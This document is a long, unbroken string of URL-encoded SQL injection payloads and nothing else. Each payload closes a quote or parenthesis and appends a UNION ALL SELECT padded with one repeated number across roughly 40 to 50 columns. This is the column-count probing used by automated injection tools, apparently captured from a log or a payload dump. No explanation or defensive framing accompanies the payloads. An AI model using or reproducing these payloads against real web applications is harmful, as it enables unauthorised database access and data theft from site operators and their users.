-2045%22%20UNION%20ALL%20SELECT%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048%2C%207048--%20%20AND%20%22oxJI%22%20LIKE%20%22oxJI -8494%22%20UNION%20ALL%20SELECT%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821%2C%208821--%20%20AND%20%22ZYGf%22%20LIKE%20%22ZYGf -8617%22%20UNION%20ALL%20SELECT%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396--%20%20AND%20%22OZmc%22%20LIKE%20%22OZmc -9075%22%20UNION%20ALL%20SELECT%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243%2C%201243--%20%20AND%20%22KoiN%22%20LIKE%20%22KoiN -7873%22%20UNION%20ALL%20SELECT%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599%2C%206599--%20%20AND%20%22TjZM%22%20LIKE%20%22TjZM -2145%22%20UNION%20ALL%20SELECT%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698--%20%20AND%20%22HKlN%22%20LIKE%20%22HKlN -3999%22%20UNION%20ALL%20SELECT%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762%2C%206762--%20%20AND%20%22VuVy%22%20LIKE%20%22VuVy -1385%22%20UNION%20ALL%20SELECT%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357--%20%20AND%20%22hYQY%22%20LIKE%20%22hYQY -6843%22%20UNION%20ALL%20SELECT%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521--%20%20AND%20%22BtxL%22%20LIKE%20%22BtxL -9884%29%20WHERE%205588%3D5588%20UNION%20ALL%20SELECT%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588%2C%205588--%20 -4764%29%20WHERE%204760%3D4760%20UNION%20ALL%20SELECT%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760--%20 -4872%29%20WHERE%201343%3D1343%20UNION%20ALL%20SELECT%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343%2C%201343--%20 -1461%29%20WHERE%202881%3D2881%20UNION%20ALL%20SELECT%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881--%20 -7503%29%20WHERE%202112%3D2112%20UNION%20ALL%20SELECT%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112%2C%202112--%20 -2722%29%20WHERE%208761%3D8761%20UNION%20ALL%20SELECT%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761%2C%208761--%20 -6655%29%20WHERE%207415%3D7415%20UNION%20ALL%20SELECT%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415%2C%207415--%20 -2531%29%20WHERE%208834%3D8834%20UNION%20ALL%20SELECT%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834%2C%208834--%20 -5653%29%20WHERE%208747%3D8747%20UNION%20ALL%20SELECT%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747%2C%208747--%20 -9954%29%20WHERE%209686%3D9686%20UNION%20ALL%20SELECT%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686--%20 -5987%27%29%20WHERE%209674%3D9674%20UNION%20ALL%20SELECT%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674%2C%209674--%20 -5250%27%29%20WHERE%202803%3D2803%20UNION%20ALL%20SELECT%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803%2C%202803--%20 -6941%27%29%20WHERE%206208%3D6208%20UNION%20ALL%20SELECT%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208%2C%206208--%20 -4971%27%29%20WHERE%203370%3D3370%20UNION%20ALL%20SELECT%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370%2C%203370--%20 -9626%27%29%20WHERE%204000%3D4000%20UNION%20ALL%20SELECT%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000%2C%204000--%20 -3583%27%29%20WHERE%204475%3D4475%20UNION%20ALL%20SELECT%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475--%20 -2064%27%29%20WHERE%208294%3D8294%20UNION%20ALL%20SELECT%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294%2C%208294--%20 -6489%27%29%20WHERE%202184%3D2184%20UNION%20ALL%20SELECT%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184--%20 -1942%27%29%20WHERE%206958%3D6958%20UNION%20ALL%20SELECT%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958%2C%206958--%20 -6359%27%29%20WHERE%209332%3D9332%20UNION%20ALL%20SELECT%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332--%20 -9343%27%20WHERE%208718%3D8718%20UNION%20ALL%20SELECT%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718%2C%208718--%20 -5652%27%20WHERE%202502%3D2502%20UNION%20ALL%20SELECT%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502%2C%202502--%20 -4891%27%20WHERE%203064%3D3064%20UNION%20ALL%20SELECT%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064%2C%203064--%20 -9090%27%20WHERE%202948%3D2948%20UNION%20ALL%20SELECT%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948%2C%202948--%20 -8932%27%20WHERE%202342%3D2342%20UNION%20ALL%20SELECT%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342%2C%202342--%20 -8796%27%20WHERE%209246%3D9246%20UNION%20ALL%20SELECT%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246%2C%209246--%20 -4256%27%20WHERE%209689%3D9689%20UNION%20ALL%20SELECT%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689--%20 -1583%27%20WHERE%208806%3D8806%20UNION%20ALL%20SELECT%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806--%20 -6391%27%20WHERE%205094%3D5094%20UNION%20ALL%20SELECT%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094--%20 -5434%27%20WHERE%204487%3D4487%20UNION%20ALL%20SELECT%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487--%20 -5374%22%20WHERE%201918%3D1918%20UNION%20ALL%20SELECT%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918%2C%201918--%20 -1107%22%20WHERE%206037%3D6037%20UNION%20ALL%20SELECT%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037--%20 -2233%22%20WHERE%205021%3D5021%20UNION%20ALL%20SELECT%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021--%20 -4787%22%20WHERE%205646%3D5646%20UNION%20ALL%20SELECT%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646--%20 -5528%22%20WHERE%207736%3D7736%20UNION%20ALL%20SELECT%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736--%20 -3358%22%20WHERE%201946%3D1946%20UNION%20ALL%20SELECT%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946%2C%201946--%20 -4030%22%20WHERE%208872%3D8872%20UNION%20ALL%20SELECT%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872--%20 -6509%22%20WHERE%202226%3D2226%20UNION%20ALL%20SELECT%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226--%20 -8488%22%20WHERE%203535%3D3535%20UNION%20ALL%20SELECT%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535--%20 